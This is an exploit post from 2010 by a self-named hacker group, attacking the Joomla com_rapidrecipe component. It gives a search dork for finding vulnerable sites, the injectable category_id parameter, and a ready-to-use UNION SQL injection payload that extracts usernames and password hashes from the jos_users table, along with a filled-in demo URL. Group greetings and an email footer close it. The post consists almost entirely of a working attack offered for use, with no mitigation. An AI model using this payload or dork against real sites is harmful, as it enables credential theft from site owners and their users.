Joomla Component (com_rapidrecipe) SQL Injection Vulnerability ########################### Author : Und3rGr0unD W4rri0rZ title:Joomla Component (com_rapidrecipe) SQL Injection Vulnerability Script : Joomla Date : 05/07/2010 Dork : inurl:"com_rapidrecipe" ########################### [ Vulnerable File ] [path]/index.php?option=com_rapidrecipe&page=viewcategory&category_id=[ SQL ] [ XpL ] -1+union+select+1,2,concat(username,0x3a,password)+from+jos_users+limit+0,1-- [ Demo] http://xxxxx/[path]/windex.php?option=com_rapidrecipe&page=viewcategory&category_id=-1+union+select+1,2,concat(username,0x3a,password)+from+jos_users+limit+0,1-- ############################################################## # Und3rGr0unD W4rri0rZ : # -HeaDShoT {pwz@hotmail.[choose any domain if you are lucky u will find me]} # -M4MIM4N {pp8@live.[choose any domain if you are lucky u will find me]} # -L363ND{a4z@live.[choose any domain if you are lucky u will find me]} # my greetz to : # ta3lab el maker # ############################################################## _________________________________________________________________ Hotmail : une messagerie fiable avec une protection anti-spam performante https://signup.live.com/signup.aspx?id=60969